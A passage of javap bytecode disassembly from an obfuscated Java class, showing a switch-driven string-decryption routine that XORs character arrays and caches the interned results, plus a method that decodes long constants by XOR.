                     226: 2306
                     227: 2311
                     228: 2317
                     229: 2322
                     230: 2327
                     231: 2333
                     232: 2339
                     233: 2345
                     234: 2351
                     235: 2356
                     236: 2362
                     237: 2368
                     238: 2374
                     239: 2380
                     240: 2386
                     241: 2392
                     242: 2398
                     243: 2404
                     244: 2408
                     245: 2413
                     246: 2418
                     247: 2423
                     248: 2428
                     249: 2434
                     250: 2440
                     251: 2446
                     252: 2451
                     253: 2456
                     254: 2462
                 default: 2468
            }
      1072: bipush        21
      1074: goto          2471
      1077: sipush        130
      1080: goto          2471
      1083: sipush        235
      1086: goto          2471
      1089: sipush        142
      1092: goto          2471
      1095: bipush        42
      1097: goto          2471
      1100: sipush        153
      1103: goto          2471
      1106: bipush        44
      1108: goto          2471
      1111: sipush        224
      1114: goto          2471
      1117: bipush        52
      1119: goto          2471
      1122: sipush        248
      1125: goto          2471
      1128: bipush        9
      1130: goto          2471
      1133: bipush        98
      1135: goto          2471
      1138: sipush        228
      1141: goto          2471
      1144: bipush        88
      1146: goto          2471
      1149: sipush        249
      1152: goto          2471
      1155: bipush        8
      1157: goto          2471
      1160: sipush        164
      1163: goto          2471
      1166: sipush        176
      1169: goto          2471
      1172: bipush        79
      1174: goto          2471
      1177: sipush        180
      1180: goto          2471
      1183: bipush        114
      1185: goto          2471
      1188: sipush        135
      1191: goto          2471
      1194: sipush        171
      1197: goto          2471
      1200: sipush        208
      1203: goto          2471
      1206: bipush        18
      1208: goto          2471
      1211: bipush        43
      1213: goto          2471
      1216: sipush        170
      1219: goto          2471
      1222: sipush        158
      1225: goto          2471
      1228: bipush        32
      1230: goto          2471
      1233: sipush        243
      1236: goto          2471
      1239: bipush        20
      1241: goto          2471
      1244: bipush        75
      1246: goto          2471
      1249: bipush        108
      1251: goto          2471
      1254: bipush        28
      1256: goto          2471
      1259: bipush        119
      1261: goto          2471
      1264: sipush        238
      1267: goto          2471
      1270: sipush        165
      1273: goto          2471
      1276: sipush        155
      1279: goto          2471
      1282: sipush        217
      1285: goto          2471
      1288: bipush        10
      1290: goto          2471
      1293: bipush        117
      1295: goto          2471
      1298: sipush        246
      1301: goto          2471
      1304: sipush        205
      1307: goto          2471
      1310: sipush        234
      1313: goto          2471
      1316: sipush        254
      1319: goto          2471
      1322: sipush        216
      1325: goto          2471
      1328: bipush        82
      1330: goto          2471
      1333: bipush        70
      1335: goto          2471
      1338: bipush        58
      1340: goto          2471
      1343: bipush        39
      1345: goto          2471
      1348: sipush        210
      1351: goto          2471
      1354: sipush        255
      1357: goto          2471
      1360: bipush        72
      1362: goto          2471
      1365: sipush        244
      1368: goto          2471
      1371: sipush        161
      1374: goto          2471
      1377: bipush        24
      1379: goto          2471
      1382: sipush        144
      1385: goto          2471
      1388: sipush        211
      1391: goto          2471
      1394: sipush        241
      1397: goto          2471
      1400: sipush        149
      1403: goto          2471
      1406: bipush        37
      1408: goto          2471
      1411: bipush        121
      1413: goto          2471
      1416: sipush        186
      1419: goto          2471
      1422: sipush        193
      1425: goto          2471
      1428: bipush        48
      1430: goto          2471
      1433: bipush        110
      1435: goto          2471
      1438: sipush        147
      1441: goto          2471
      1444: bipush        12
      1446: goto          2471
      1449: sipush        232
      1452: goto          2471
      1455: bipush        81
      1457: goto          2471
      1460: sipush        231
      1463: goto          2471
      1466: bipush        53
      1468: goto          2471
      1471: bipush        95
      1473: goto          2471
      1476: sipush        148
      1479: goto          2471
      1482: bipush        97
      1484: goto          2471
      1487: sipush        181
      1490: goto          2471
      1493: sipush        197
      1496: goto          2471
      1499: bipush        45
      1501: goto          2471
      1504: sipush        167
      1507: goto          2471
      1510: iconst_5
      1511: goto          2471
      1514: bipush        6
      1516: goto          2471
      1519: bipush        115
      1521: goto          2471
      1524: bipush        25
      1526: goto          2471
      1529: sipush        156
      1532: goto          2471
      1535: sipush        184
      1538: goto          2471
      1541: bipush        80
      1543: goto          2471
      1546: bipush        94
      1548: goto          2471
      1551: bipush        118
      1553: goto          2471
      1556: bipush        85
      1558: goto          2471
      1561: sipush        163
      1564: goto          2471
      1567: sipush        209
      1570: goto          2471
      1573: sipush        200
      1576: goto          2471
      1579: bipush        34
      1581: goto          2471
      1584: bipush        109
      1586: goto          2471
      1589: sipush        233
      1592: goto          2471
      1595: bipush        49
      1597: goto          2471
      1600: bipush        17
      1602: goto          2471
      1605: bipush        105
      1607: goto          2471
      1610: bipush        54
      1612: goto          2471
      1615: sipush        192
      1618: goto          2471
      1621: sipush        179
      1624: goto          2471
      1627: bipush        66
      1629: goto          2471
      1632: bipush        62
      1634: goto          2471
      1637: bipush        113
      1639: goto          2471
      1642: sipush        219
      1645: goto          2471
      1648: sipush        166
      1651: goto          2471
      1654: iconst_3
      1655: goto          2471
      1658: sipush        226
      1661: goto          2471
      1664: sipush        154
      1667: goto          2471
      1670: bipush        33
      1672: goto          2471
      1675: bipush        111
      1677: goto          2471
      1680: bipush        46
      1682: goto          2471
      1685: bipush        78
      1687: goto          2471
      1690: bipush        101
      1692: goto          2471
      1695: iconst_0
      1696: goto          2471
      1699: bipush        51
      1701: goto          2471
      1704: bipush        11
      1706: goto          2471
      1709: bipush        23
      1711: goto          2471
      1714: sipush        132
      1717: goto          2471
      1720: sipush        150
      1723: goto          2471
      1726: bipush        84
      1728: goto          2471
      1731: sipush        206
      1734: goto          2471
      1737: bipush        67
      1739: goto          2471
      1742: bipush        122
      1744: goto          2471
      1747: sipush        191
      1750: goto          2471
      1753: sipush        204
      1756: goto          2471
      1759: sipush        185
      1762: goto          2471
      1765: sipush        137
      1768: goto          2471
      1771: bipush        40
      1773: goto          2471
      1776: bipush        36
      1778: goto          2471
      1781: sipush        201
      1784: goto          2471
      1787: bipush        112
      1789: goto          2471
      1792: bipush        90
      1794: goto          2471
      1797: sipush        250
      1800: goto          2471
      1803: sipush        160
      1806: goto          2471
      1809: bipush        55
      1811: goto          2471
      1814: sipush        198
      1817: goto          2471
      1820: sipush        222
      1823: goto          2471
      1826: iconst_2
      1827: goto          2471
      1830: bipush        91
      1832: goto          2471
      1835: sipush        128
      1838: goto          2471
      1841: bipush        74
      1843: goto          2471
      1846: sipush        183
      1849: goto          2471
      1852: bipush        96
      1854: goto          2471
      1857: sipush        136
      1860: goto          2471
      1863: bipush        77
      1865: goto          2471
      1868: bipush        86
      1870: goto          2471
      1873: bipush        116
      1875: goto          2471
      1878: sipush        157
      1881: goto          2471
      1884: sipush        202
      1887: goto          2471
      1890: bipush        106
      1892: goto          2471
      1895: bipush        15
      1897: goto          2471
      1900: sipush        230
      1903: goto          2471
      1906: bipush        99
      1908: goto          2471
      1911: bipush        100
      1913: goto          2471
      1916: bipush        64
      1918: goto          2471
      1921: sipush        152
      1924: goto          2471
      1927: sipush        251
      1930: goto          2471
      1933: sipush        242
      1936: goto          2471
      1939: bipush        57
      1941: goto          2471
      1944: sipush        237
      1947: goto          2471
      1950: sipush        172
      1953: goto          2471
      1956: sipush        190
      1959: goto          2471
      1962: bipush        38
      1964: goto          2471
      1967: sipush        245
      1970: goto          2471
      1973: sipush        145
      1976: goto          2471
      1979: sipush        227
      1982: goto          2471
      1985: sipush        240
      1988: goto          2471
      1991: bipush        50
      1993: goto          2471
      1996: sipush        178
      1999: goto          2471
      2002: bipush        127
      2004: goto          2471
      2007: sipush        223
      2010: goto          2471
      2013: sipush        199
      2016: goto          2471
      2019: sipush        177
      2022: goto          2471
      2025: bipush        102
      2027: goto          2471
      2030: sipush        151
      2033: goto          2471
      2036: sipush        134
      2039: goto          2471
      2042: bipush        71
      2044: goto          2471
      2047: sipush        195
      2050: goto          2471
      2053: bipush        61
      2055: goto          2471
      2058: bipush        124
      2060: goto          2471
      2063: bipush        123
      2065: goto          2471
      2068: bipush        120
      2070: goto          2471
      2073: sipush        168
      2076: goto          2471
      2079: bipush        63
      2081: goto          2471
      2084: sipush        212
      2087: goto          2471
      2090: sipush        143
      2093: goto          2471
      2096: sipush        215
      2099: goto          2471
      2102: bipush        60
      2104: goto          2471
      2107: bipush        22
      2109: goto          2471
      2112: sipush        213
      2115: goto          2471
      2118: bipush        13
      2120: goto          2471
      2123: bipush        47
      2125: goto          2471
      2128: sipush        129
      2131: goto          2471
      2134: bipush        103
      2136: goto          2471
      2139: sipush        218
      2142: goto          2471
      2145: bipush        56
      2147: goto          2471
      2150: sipush        207
      2153: goto          2471
      2156: iconst_4
      2157: goto          2471
      2160: sipush        141
      2163: goto          2471
      2166: bipush        69
      2168: goto          2471
      2171: sipush        159
      2174: goto          2471
      2177: bipush        19
      2179: goto          2471
      2182: bipush        107
      2184: goto          2471
      2187: bipush        104
      2189: goto          2471
      2192: sipush        131
      2195: goto          2471
      2198: bipush        14
      2200: goto          2471
      2203: bipush        65
      2205: goto          2471
      2208: sipush        146
      2211: goto          2471
      2214: sipush        236
      2217: goto          2471
      2220: sipush        162
      2223: goto          2471
      2226: bipush        35
      2228: goto          2471
      2231: bipush        16
      2233: goto          2471
      2236: sipush        133
      2239: goto          2471
      2242: bipush        92
      2244: goto          2471
      2247: bipush        87
      2249: goto          2471
      2252: bipush        30
      2254: goto          2471
      2257: sipush        138
      2260: goto          2471
      2263: sipush        214
      2266: goto          2471
      2269: sipush        247
      2272: goto          2471
      2275: bipush        125
      2277: goto          2471
      2280: bipush        89
      2282: goto          2471
      2285: sipush        188
      2288: goto          2471
      2291: bipush        26
      2293: goto          2471
      2296: bipush        93
      2298: goto          2471
      2301: bipush        68
      2303: goto          2471
      2306: bipush        76
      2308: goto          2471
      2311: sipush        174
      2314: goto          2471
      2317: bipush        59
      2319: goto          2471
      2322: bipush        31
      2324: goto          2471
      2327: sipush        169
      2330: goto          2471
      2333: sipush        253
      2336: goto          2471
      2339: sipush        182
      2342: goto          2471
      2345: sipush        187
      2348: goto          2471
      2351: bipush        41
      2353: goto          2471
      2356: sipush        220
      2359: goto          2471
      2362: sipush        203
      2365: goto          2471
      2368: sipush        173
      2371: goto          2471
      2374: sipush        196
      2377: goto          2471
      2380: sipush        239
      2383: goto          2471
      2386: sipush        139
      2389: goto          2471
      2392: sipush        225
      2395: goto          2471
      2398: sipush        252
      2401: goto          2471
      2404: iconst_1
      2405: goto          2471
      2408: bipush        83
      2410: goto          2471
      2413: bipush        7
      2415: goto          2471
      2418: bipush        29
      2420: goto          2471
      2423: bipush        27
      2425: goto          2471
      2428: sipush        189
      2431: goto          2471
      2434: sipush        221
      2437: goto          2471
      2440: sipush        229
      2443: goto          2471
      2446: bipush        73
      2448: goto          2471
      2451: bipush        126
      2453: goto          2471
      2456: sipush        175
      2459: goto          2471
      2462: sipush        140
      2465: goto          2471
      2468: sipush        194
      2471: istore        5
      2473: iload_1
      2474: iload_2
      2475: ixor
      2476: dup
      2477: istore_1
      2478: sipush        255
      2481: iand
      2482: iload         5
      2484: isub
      2485: istore        6
      2487: iload         6
      2489: ifge          2498
      2492: iinc_w        6, 256
      2498: iload_1
      2499: ldc           #4                  // int 65535
      2501: iand
      2502: bipush        8
      2504: iushr
      2505: iload         5
      2507: isub
      2508: istore        7
      2510: iload         7
      2512: ifge          2521
      2515: iinc_w        7, 256
      2521: iconst_0
      2522: istore        8
      2524: goto          2602
      2527: iload         8
      2529: iconst_2
      2530: irem
      2531: istore        9
      2533: aload         4
      2535: iload         8
      2537: dup2
      2538: caload
      2539: iload         9
      2541: ifne          2573
      2544: iload         6
      2546: ixor
      2547: i2c
      2548: castore
      2549: iload         6
      2551: iconst_3
      2552: iushr
      2553: iload         6
      2555: iconst_5
      2556: ishl
      2557: ior
      2558: aload         4
      2560: iload         8
      2562: caload
      2563: ixor
      2564: sipush        255
      2567: iand
      2568: istore        6
      2570: goto          2599
      2573: iload         7
      2575: ixor
      2576: i2c
      2577: castore
      2578: iload         7
      2580: iconst_3
      2581: iushr
      2582: iload         7
      2584: iconst_5
      2585: ishl
      2586: ior
      2587: aload         4
      2589: iload         8
      2591: caload
      2592: ixor
      2593: sipush        255
      2596: iand
      2597: istore        7
      2599: iinc          8, 1
      2602: iload         8
      2604: aload         4
      2606: arraylength
      2607: if_icmplt     2527
      2610: getstatic     #120                // Field b:[Ljava/lang/String;
      2613: iload_3
      2614: new           #89                 // class java/lang/String
      2617: dup
      2618: aload         4
      2620: invokespecial #27                 // Method java/lang/String."<init>":([C)V
      2623: invokevirtual #298                // Method java/lang/String.intern:()Ljava/lang/String;
      2626: aastore
      2627: getstatic     #120                // Field b:[Ljava/lang/String;
      2630: iload_3
      2631: aaload
      2632: areturn

  private static long a(int, long);
    Code:
         0: iload_0
         1: lload_1
         2: l2i
         3: ixor
         4: sipush        25394
         7: ixor
         8: sipush        32767
        11: iand
        12: istore_3
        13: getstatic     #137                // Field d:[Ljava/lang/Long;
        16: iload_3
        17: aaload
        18: ifnonnull     36
        21: getstatic     #137                // Field d:[Ljava/lang/Long;
        24: iload_3
        25: getstatic     #76                 // Field c:[J
        28: iload_3
        29: laload
        30: lload_1
        31: lxor
        32: invokestatic  #238                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
        35: aastore
        36: getstatic     #137                // Field d:[Ljava/lang/Long;
        39: iload_3
        40: aaload
        41: invokevirtual #103                // Method java/lang/Long.longValue:()J
        44: lreturn
}
